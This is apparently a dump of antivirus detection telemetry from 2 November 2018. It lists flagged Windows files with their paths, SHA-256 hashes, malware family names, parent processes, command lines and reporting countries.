  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1f06e353466caf56f94fcd51601058b7064dd9dca386e84e4636a7e8a661078f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:42:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0003139.exe', filepath='\\\\?\\E:\\System Volume Information\\_restore{A62AD956-9D25-452C-B4C0-FA01DCD76CDA}\\RP14\\A0003139.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='1f4185244578f8f7f52d8a86d71173c8e3b7e7d535b406ea8349d8d534d04565', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1f8214f374633d3f9c2fe0a2899bec7a8acb0aaaad5ec699ffa8ca30d6f77e43', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\1F8214F374633D3F9C2FE0A2899BEC7A8ACB0AAAAD5EC699FFA8CA30D6F77E43', filesize=64000, name='BDS/Bladabindi.ajtu.#M1.#R1'), hash='1f8214f374633d3f9c2fe0a2899bec7a8acb0aaaad5ec699ffa8ca30d6f77e43', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T12:59:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=9024000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='201ec53fc221b11362c6c0b74e3ae6277752cfee6f589a94b26c289dd919db94', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:17:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-013735-3424f796', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-013735-3424F796', filesize=296000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='20cae32feda0d42f0a8e9ed811ceb5e43e8474eecfc3afb052811a383f21d2f4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061710-2363b016', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-061710-2363B016', filesize=296000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='20cae32feda0d42f0a8e9ed811ceb5e43e8474eecfc3afb052811a383f21d2f4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:19:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\20D8EEE609BD1C6053B4D278F95AECEFBA2B7210BC971F0AE513ED2E0C644479', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\20D8EEE609BD1C6053B4D278F95AECEFBA2B7210BC971F0AE513ED2E0C644479', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:28:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:36:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:15:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0005954.exe', filepath='D:\\System Volume Information\\_restore{6B806EF6-C686-49F4-AC4B-5CBDA4B84782}\\RP14\\A0005954.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='2116a91ced1870a0445281a003c7b85885720efea80d4928b86f992cf7c5b724', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:45:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m1.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M1\\M1.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='21ca02bada3946e0cd7cd5369227ca9f3cecef0e0eb5b890a5bae158c0c715dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7867A1B7-AB4F-4FAF-8BE8-E64B0D8AA5B0}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='21e07b31f103951d4648e184e7fbb717f1f0d6d41d7e45fb361438819bc14bb3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d3d8.dll', filepath='D:\\PlayConquer\\PlayConquer\\PATCHDATE\\Env_DX8\\d3d8.dll', filesize=1920000, name='HEUR/AGEN.1034484.#M1.#R1'), hash='22048a7949f5a6188a639c61ae13ef41d9ee2f0f76f54ea7f82f31b0f0de0a3a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:07:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdfl70.dll', filepath='l:\\PDFL70.dll', filesize=4096000, name='W32/Ramnit.C.#M1.#R1'), hash='22079ca0f23065189fc6d4db21f99b6153fe271a3ab8cf87709ac18ee35fa283', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194131-0cbf8872', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b11b1ca\\AVSCAN-20181102-193217-BF7EF458\\AVSCAN-20181102-194131-0CBF8872', filesize=5440000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='228bb4b4b836a185f7a3b5ba2fce102975c759ef502bd25169ec90fd18f6ff04', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:42:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:49:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:49:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winampa.exe', filepath='C:\\Program Files\\Winamp\\winampa.exe', filesize=128000, name='W32/Sality.AW.#M1.#R1'), hash='22ba6370f761c9dd8341f7075c959892d3aaa3822856d1b18b142121c2f72ee8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:56:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='@mms.exe', filepath='D:\\Files\\@mms.exe', filesize=4096000, name='TR/Worm.Gen.#M300.#R7610'), hash='2316af70222b1bb0d48c53078808ec662a0e57b16cf6392f5d2e80ca7eb4a477', metadata=Row(cmdline='rtp', country='UG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903696, timestamp='2018-11-02T09:07:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010657', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010657', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010741', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010741', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010785', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010785', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000106f3', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp000106f3', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001071f', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0001071f', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010763', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010763', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000106c7', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp000106c7', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:34:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010613', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010613', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0001069b', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0001069b', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010635', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010635', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010679', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010679', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msrdt.exe', filepath='\\\\?\\C:\\ProgramData\\msrdt.exe', filesize=70256000, name='HEUR/AGEN.1002942.#M1.#R1'), hash='23293d0c219bdc7061c1a0713a5ee5be6f21f5ad0e213c012880938cb8d2c285', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:50:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='D:\\Master\\Visual Basic\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='233663964a4c9e01582817103c0be5f1f73a1730bd9b673d4eafe0eae08acb09', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-02T04:17:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='D:\\Master\\Visual Basic\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='233663964a4c9e01582817103c0be5f1f73a1730bd9b673d4eafe0eae08acb09', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T06:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184630-5da0e05e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1cb6d92\\AVSCAN-20181102-184104-3026B999\\AVSCAN-20181102-184630-5DA0E05E', filesize=128000, name='TR/Crypt.XPACK.xjjbh.#M1.#R1'), hash='2351fb3f6ae72db120e54d1885e58b50305b1a91cb5db2bcf8b9866acf409df2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:46:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\FDImages\\WinMe\\disk1\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='2357eea171d10095aca83f7d725945e67e37415f5d0a733d95d190b059d16905', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dpinst64.exe', filepath='D:\\User Before\\Lenovo Driver HRM\\Wireless_18.11.0_Ds64\\DPInst64.exe', filesize=1092000, name='W32/Neshta.A.#M1.#R1'), hash='23e6ee9ba866136e9c084b7021e88e8e51d3a3b544589c3a5fed10fc6c3cfc9f', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:55:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dpinst64.exe', filepath='D:\\User Before\\Lenovo Driver HRM\\Wireless_18.11.0_Ds64\\DPInst64.exe', filesize=1092000, name='W32/Neshta.A.#M1.#R1'), hash='23e6ee9ba866136e9c084b7021e88e8e51d3a3b544589c3a5fed10fc6c3cfc9f', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qualcomm+premium+tool+v24.exe', filepath='C:\\Users\\X\\Downloads\\Qualcomm+Premium+Tool+v24.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='23f1dc5ebee68a180146fb4cada07dcaad2bbb9822292da223112bb2dbc2b8e7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qualcomm+premium+tool+v24.exe', filepath='C:\\Users\\X\\Downloads\\Qualcomm+Premium+Tool+v24.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='23f1dc5ebee68a180146fb4cada07dcaad2bbb9822292da223112bb2dbc2b8e7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=817240, timestamp='2018-11-02T14:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qualcomm+premium+tool+v24.exe', filepath='C:\\Users\\X\\Downloads\\Qualcomm+Premium+Tool+v24.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='23f1dc5ebee68a180146fb4cada07dcaad2bbb9822292da223112bb2dbc2b8e7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212221-21c0bafb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dae45dc9\\AVSCAN-20181102-212202-1F6D8A2B\\AVSCAN-20181102-212221-21C0BAFB', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='23f1dc5ebee68a180146fb4cada07dcaad2bbb9822292da223112bb2dbc2b8e7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='t_uninstall_tools.html', filepath='C:\\Program Files\\VMware\\VMware Workstation\\help\\player_win\\t_uninstall_tools.html', filesize=124000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='24042c8fcac087d8648cff3ece634b63f9f56ca880a20dc0252f49b29a544641', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T09:13:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105204-2e41a2ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-105149-2BB29E06\\AVSCAN-20181102-105204-2E41A2AB', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:52:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flame painter.exe', filepath='C:\\Users\\X\\Documents\\WeChat Files\\chenting306536\\Files\\Flame Painter.exe', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline='Files (x86)\\\\\\\\360\\\\\\\\360safe\\\\\\\\safemon\\\\\\\\WDSafeDown.exe \\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\wdF9E1.tmp\\\\\\"', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\360\\360safe\\safemon\\WDSafeDown.exe', parentsize=288864, timestamp='2018-11-02T02:38:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105008-1b4ffc54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-104953-18C80AF6\\AVSCAN-20181102-105008-1B4FFC54', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105015-1c4df5d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-104953-18C80AF6\\AVSCAN-20181102-105015-1C4DF5D8', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flame painter.exe', filepath='D:\\#BIG电脑文件\\D\\BIG\\资料收集\\FLAME PAINTER.EXE', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:51:30Z'), dt=datetime.date(2018, 11, 2)),
